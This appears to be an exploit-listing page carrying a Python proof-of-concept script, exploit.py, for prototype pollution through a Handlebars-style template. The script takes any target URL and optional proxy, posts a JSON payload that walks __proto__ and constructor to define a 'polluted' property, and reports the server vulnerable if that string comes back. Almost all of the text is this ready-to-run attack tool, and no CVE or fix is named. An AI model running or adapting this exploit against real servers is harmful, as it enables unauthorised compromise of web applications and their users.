4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import requests
import json
import logging

# Setup logging
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')

def exploit(url, proxy=None, timeout=10):
    # Payload to exploit Prototype Pollution
    payload = {
        "template": "{{#with __proto__}}{{#with constructor}}{{defineProperty 'polluted' this}}{{/with}}{{/with}}"
    }

    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
    }
    
    proxies = None
    if proxy:
        proxies = {
            'http': proxy,
            'https': proxy
        }
    
    try:
        logging.info(f"Sending exploit to {url}...")
        if proxies:
            logging.info(f"Using proxy: {proxies}")
        response = requests.post(url, data=json.dumps(payload), headers=headers, proxies=proxies, timeout=timeout)

        if response.status_code == 200:
            logging.info("Exploit executed successfully.")
            # Try to parse as JSON for more accurate detection
            try:
                resp_json = response.json()
                if 'polluted' in str(resp_json):  # Check for pollution indicator
                    logging.warning("The server is vulnerable to prototype pollution!")
                else:
                    logging.info("Server responded, but exploit did not seem to work.")
            except json.JSONDecodeError:
                # Fallback to text if not JSON
                if 'polluted' in response.text:
                    logging.warning("The server is vulnerable to prototype pollution!")
                else:
                    logging.info("Server responded, but exploit did not seem to work.")
        else:
            logging.error(f"Exploit failed with status code: {response.status_code}")
    except requests.RequestException as e:
        logging.error(f"Error: {e}")
        if proxies:
            logging.error("Check if proxy is running and accessible.")

if __name__ == "__main__":
    target_url = input("Enter the target URL: ")
    proxy_url = input("Enter proxy URL (leave blank if none): ").strip()
    proxy = proxy_url if proxy_url else None
    timeout_input = input("Enter timeout in seconds (default 10): ").strip()
    timeout = int(timeout_input) if timeout_input.isdigit() else 10
    exploit(target_url, proxy, timeout)